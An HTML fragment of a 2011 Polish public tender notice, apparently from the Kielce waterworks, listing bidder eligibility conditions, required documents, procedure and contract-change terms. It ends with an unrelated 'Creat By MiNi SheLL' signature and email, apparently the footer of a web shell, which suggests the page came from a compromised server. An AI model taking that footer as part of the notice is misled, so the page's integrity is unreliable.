<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania postawionego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania postawionego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania postawionego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania postawionego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania postawionego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo do podpisania oferty i załączników do niej oraz umowy  w przypadku jego udzielenia.

2.Oświadczenie o solidarnej odpowiedzialności za należyte wykonanie zobowiązania 
w przypadku  podmiotów występujących wspólnie.

3.Spis przekazanych materiałów biurowych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie realizacji dostawy   Zamawiający przewiduje zmianę zapisów treści umowy  
w następującym przypadku:
- niedostępności na rynku produktu spowodowanej wstrzymaniem, zaprzestaniem produkcji lub wycofaniem z rynku; zamiana marki produktu, nie może pociągać za sobą zmiany ceny, przy czym jakość proponowanej  marki musi być równorzędna lub lepsza.
- ustawowej zmiany stawki podatku VAT od towarów i usług, strony dopuszczają zmianę wynagrodzenia o kwotę wynikającą ze zmiany podatku VAT naliczonego od przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/ / wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 25-701 Kielce, ul.Krakowska 64  Biuro Obsługi Klienta  Wodociągów Kieleckich.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2011 godzina 09:45, miejsce: 25-701 Kielce, ul.Krakowska 64  Biuro Obsługi Klienta  Wodociągów Kieleckich.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com